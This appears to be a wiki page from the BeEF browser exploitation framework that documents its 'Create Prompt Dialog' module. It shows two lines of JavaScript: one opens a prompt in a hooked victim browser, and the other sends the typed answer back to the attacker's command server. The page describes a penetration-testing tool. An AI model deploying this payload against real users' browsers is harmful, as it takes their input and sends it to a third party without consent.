Skip to content

Module: Create Prompt Dialog

Haoxi Tan edited this page Jan 9, 2020 · 2 revisions

Summary

  • Objective: Create a prompt dialog

  • Authors: wade, bm

  • Browsers: All

  • Code

Internal Working

var answer = prompt("<%== @question %>","")
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);

Feedback

Clone this wiki locally